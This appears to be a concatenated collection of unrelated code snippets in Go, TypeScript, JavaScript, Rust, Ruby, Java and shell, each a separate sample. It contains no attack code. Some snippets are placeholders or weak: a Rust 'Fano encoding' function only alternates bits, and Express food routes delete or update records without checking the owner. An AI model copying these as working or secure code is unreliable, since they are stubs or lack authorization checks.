func (m *migrator) getInstanceStruct(pair serviceInstancePair) *v1alpha1.ServiceInstance {
plan := m.Plans[pair.smInstance.ServicePlanID]
service := m.Services[plan.ServiceOfferingID]
parametersFrom := make([]v1alpha1.ParametersFromSource, 0)
for _, param := range pair.svcatInstance.Spec.ParametersFrom {
parametersFrom = append(parametersFrom, v1alpha1.ParametersFromSource{
SecretKeyRef: &v1alpha1.SecretKeyReference{
Name: param.SecretKeyRef.Name,
Key: param.SecretKeyRef.Key,
},
})
}
userInfo, err := json.Marshal(pair.svcatInstance.Spec.UserInfo)
if err != nil {
m.ac.Logger.Infof("failed to parse user info for instance %s: %v", pair.svcatInstance.Name, err.Error())
}
return &v1alpha1.ServiceInstance{
TypeMeta: metav1.TypeMeta{
APIVersion: fmt.Sprintf("%s/%s", operatorGroupName, operatorGroupVersion),
Kind: "ServiceInstance",
},
ObjectMeta: metav1.ObjectMeta{
Name: pair.svcatInstance.Name,
Namespace: pair.svcatInstance.Namespace,
Labels: map[string]string{
migratedLabel: "true",
},
Annotations: map[string]string{
"original_creation_timestamp": pair.svcatInstance.CreationTimestamp.String(),
"original_user_info": string(userInfo)},
},
Spec: v1alpha1.ServiceInstanceSpec{
ServicePlanName: plan.Name,
ServiceOfferingName: service.Name,
ExternalName: pair.smInstance.Name,
ParametersFrom: parametersFrom,
Parameters: pair.svcatInstance.Spec.Parameters,
},
}
}
func (m *migrator) getBindingStruct(pair serviceBindingPair) *v1alpha1.ServiceBinding {
parametersFrom := make([]v1alpha1.ParametersFromSource, 0)
for _, param := range pair.svcatBinding.Spec.ParametersFrom {
parametersFrom = append(parametersFrom, v1alpha1.ParametersFromSource{
SecretKeyRef: &v1alpha1.SecretKeyReference{
Name: param.SecretKeyRef.Name,
Key: param.SecretKeyRef.Key,
},
})
}
userInfo, err := json.Marshal(pair.svcatBinding.Spec.UserInfo)
if err != nil {
m.ac.Logger.Infof("failed to parse user info for binding %s. Error: %v", pair.svcatBinding.Name, err.Error())
}
return &v1alpha1.ServiceBinding{
TypeMeta: metav1.TypeMeta{
APIVersion: fmt.Sprintf("%s/%s", operatorGroupName, operatorGroupVersion),
Kind: "ServiceBinding",
},
ObjectMeta: metav1.ObjectMeta{
Name: pair.svcatBinding.Name,
Namespace: pair.svcatBinding.Namespace,
Labels: map[string]string{
migratedLabel: "true",
},
Annotations: map[string]string{
"original_creation_timestamp": pair.svcatBinding.CreationTimestamp.String(),
"original_user_info": string(userInfo)},
},
Spec: v1alpha1.ServiceBindingSpec{
ServiceInstanceName: pair.svcatBinding.Spec.InstanceRef.Name,
ExternalName: pair.smBinding.Name,
ParametersFrom: parametersFrom,
Parameters: pair.svcatBinding.Spec.Parameters,
},
}
}
func (m *migrator) ignoreAlreadyMigrated(obj, res object, err error) error {
if err == nil {
return nil
}
if !errors.IsAlreadyExists(err) {
return err
}
kind := obj.GetObjectKind().GroupVersionKind().Kind
resource := fmt.Sprintf("%vs", strings.ToLower(kind))
if err := m.SapOperatorRestClient.Get().Namespace(obj.GetNamespace()).Resource(resource).Name(obj.GetName()).Do(m.ac.Context).Into(res); err != nil {
return err
}
if res.GetLabels()[migratedLabel] != "true" {
return fmt.Errorf("resource already exists and is missing label %v", migratedLabel)
}
return nil
}
func (m *migrator) getMigrateBindingRequestBody(k8sName string, secret *corev1.Secret) (string, error) {
var err error
secretData := []byte("")
secretDataEncoded := make(map[string]string)
if secret != nil {
for k, v := range secret.Data {
secretDataEncoded[k] = string(v)
}
secretData, err = json.Marshal(secretDataEncoded)
if err != nil {
return "", err
}
}
return fmt.Sprintf(`
{
"k8sname": "%s",
"credentials": %s
}`, k8sName, secretData), nil
}
|
declare module 'http' {
export interface Error {
message: string;
status: number;
}
export interface DefaultsHeader {
mode: RequestMode;
cache: RequestCache;
credentials: RequestCredentials;
headers: HeadersInit;
redirect: RequestRedirect;
referrer: RequestReferrer;
}
export interface ParamsProps {
url: string;
body?: string;
headers?: HeadersInit;
method: string;
}
export interface ReqeustParameter extends DefaultsHeader {
method: string;
body?: string;
signal: AbortSignal;
}
}
|
<reponame>jtrussell/candidate-elimination
describe('Constant: uni.UNI_MIN', function() {
'use strict';
var min;
beforeEach(module('uni.min.constant'));
beforeEach(inject(function(UNI_MIN) {
min = UNI_MIN;
}));
it('should be a number', function() {
expect(min).toEqual(jasmine.any(Number));
});
});
|
<gh_stars>0
/**
* @param preferences - an array of integers. Indices of people, whom they love
* @returns number of love triangles
*/
module.exports = function getLoveTrianglesCount(preferences = []) {
let count=0;
preferences.forEach((item,i,arr)=>{
if(arr.indexOf(arr[arr[arr[item-1]-1]-1]) === i)
{count++};
});
return Math.floor(count/3);
};
|
fn transform_and_encode(input: &str) -> String {
// Define a function to split the text into graphemes
fn split_into_graphemes(text: &str) -> Vec<String> {
text.graphemes(true).map(|g| g.to_string()).collect()
}
// Apply grapheme-based transformation
let graphemes = split_into_graphemes(input);
// Define a function to perform Fano encoding
fn fano_encode(graphemes: &[String]) -> String {
// Perform Fano encoding logic here
// For demonstration purposes, a simple encoding is used
let encoded: String = graphemes
.iter()
.enumerate()
.map(|(i, _)| if i % 2 == 0 { '0' } else { '1' })
.collect();
encoded
}
// Encode the transformed graphemes using Fano encoding
fano_encode(&graphemes)
}
|
package bridge
import (
"fmt"
"testing"
)
func Test(t *testing.T) {
t.Run("start: ", NewShapeCircleTest)
}
func NewShapeCircleTest(t *testing.T) {
redCircle := NewShapeCircle(5, 6, 8, NewRedCircle())
if redCircle != nil {
redCircle.Draw()
} else {
fmt.Println("red circle test fail.")
}
greenCircle := NewShapeCircle(1, 2, 4, NewGreenCircle())
if greenCircle != nil {
greenCircle.Draw()
} else {
fmt.Println("green circle test fail.")
}
}
|
<filename>src/components/onboarding/views/Username.js
import React from 'react'
import PropTypes from 'prop-types'
import Navigation from 'Common/Navigation'
const Username = ({ previous, next, handleValueChange, email, username }) => (
<section>
<h3>
Username
</h3>
<input
type="text"
name="username"
value={username}
onChange={handleValueChange}
/>
<Navigation
previous={previous}
next={next}
/>
</section>
)
Username.propTypes = {
previous: PropTypes.func.isRequired,
next: PropTypes.func.isRequired,
handleValueChange: PropTypes.func.isRequired,
email: PropTypes.string.isRequired,
username: PropTypes.string.isRequired
}
export default Username
|
module KubeDSL::DSL::V1
class AzureFileVolumeSource < ::KubeDSL::DSLObject
value_field :read_only
value_field :secret_name
value_field :share_name
validates :read_only, field: { format: :boolean }, presence: false
validates :secret_name, field: { format: :string }, presence: false
validates :share_name, field: { format: :string }, presence: false
def serialize
{}.tap do |result|
result[:readOnly] = read_only
result[:secretName] = secret_name
result[:shareName] = share_name
end
end
def kind_sym
:azure_file_volume_source
end
end
end
|
<reponame>mdominick300/Nutrition_Journal<filename>routes/food-api-routes.js
var db = require('../models');
module.exports = function (app) {
app.get('/api/foods', function (req, res) {
// console.log(req.user)
var query = {};
if (req.user.id) {
query.UserId = req.user.id;
}
db.Food.findAll({
where: query,
}).then(function (dbFood) {
res.json(dbFood);
});
});
app.post('/api/foods', function (req, res) {
db.Food.create(req.body).then(function (dbFood) {
res.json(dbFood);
});
});
app.delete('/api/foods/:id', function (req, res) {
db.Food.destroy({
where: {
id: req.params.id
}
}).then(function (dbFood) {
res.json(dbFood);
});
});
app.put('/api/foods', function (req, res) {
db.Food.update(
req.body,
{
where: {
id: req.body.id
}
}).then(function (dbFood) {
res.json(dbFood);
});
});
};
|
const express = require('express');
const router = express.Router();
const Product = require('../models/Product');
router.get('/search', (req, res) => {
const query = req.query.name;
const products = Product.findByName(query);
const recommendations = Product.getRecommendations(query);
res.status(200).json({
products,
recommendations
});
});
module.exports = router;
|
/* $Id$ */
/***************************************************************************
* (C) Copyright 2003-2010 - Stendhal *
***************************************************************************
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
package games.stendhal.client.gui.j2d.entity;
import java.util.HashMap;
import java.util.Map;
//
//
import games.stendhal.client.entity.IEntity;
import games.stendhal.client.sprite.Sprite;
import games.stendhal.client.sprite.SpriteStore;
import marauroa.common.Logger;
/**
* The 2D view of an animated entity.
*
* @param <T> entity type
*/
abstract class StateEntity2DView<T extends IEntity> extends Entity2DView<T> {
/**
* Log4J.
*/
private static final Logger logger = Logger
.getLogger(StateEntity2DView.class);
/**
* Map of named sprites.
*/
protected Map<Object, Sprite> sprites = new HashMap<Object, Sprite>();
//
// StateEntity2DView
//
/**
* Build animations.
*
* @param entity the entity to build animations for
*/
private void buildAnimations(T entity) {
buildSprites(entity, sprites);
}
/**
* Populate named state sprites.
*
* @param entity The entity to build sprites for
* @param map
* The map to populate.
*/
protected abstract void buildSprites(T entity, final Map<Object, Sprite> map);
/**
* Get a keyed state sprite.
*
* @param state
* The state.
*
* @return The appropriate sprite for the given state.
*/
protected Sprite getSprite(final Object state) {
return sprites.get(state);
}
/**
* Get the current model state.
*
* @param entity
* @return The model state.
*/
protected abstract Object getState(T entity);
/**
* Get the current animated sprite.
*
* @param entity
* @return The appropriate sprite for the current state.
*/
private Sprite getStateSprite(T entity) {
final Object state = getState(entity);
final Sprite sprite = getSprite(state);
if (sprite == null) {
logger.debug("No sprite found for: " + state);
return SpriteStore.get().getFailsafe();
}
return sprite;
}
//
// Entity2DView
//
/**
* Build the visual representation of this entity. This builds all the
* animation sprites and sets the default frame.
*/
@Override
protected void buildRepresentation(T entity) {
buildAnimations(entity);
setSprite(getStateSprite(entity));
}
/**
* Update sprite state of the entity.
*
* @param entity
*/
protected void proceedChangedState(T entity) {
setSprite(getStateSprite(entity));
}
}
|
#!/bin/sh
# Prints the UUID of the named provisioning profile.
# The argument should be either "Viewfinder Ad Hoc" or "Viewfinder Distribution".
profile="$1"
full_path=$(grep -l "$profile" "${HOME}/Library/MobileDevice/Provisioning Profiles/"*.mobileprovision)
basename -s .mobileprovision "$full_path"
|
#!/bin/sh
#
# Usage from makefile:
# ELOG = . $(topdir)/build/autoconf/print-failed-commands.sh
# $(ELOG) $(CC) $CFLAGS -o $@ $<
#
# This shell script is used by the build system to print out commands that fail
# to execute properly. It is designed to make the "make -s" command more
# useful.
#
# Note that in the example we are sourcing rather than execing the script.
# Since make already started a shell for us, we might as well use it rather
# than starting a new one.
( exec "$@" ) || {
echo
echo "In the directory " `pwd`
echo "The following command failed to execute properly:"
echo "$@"
exit 1;
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.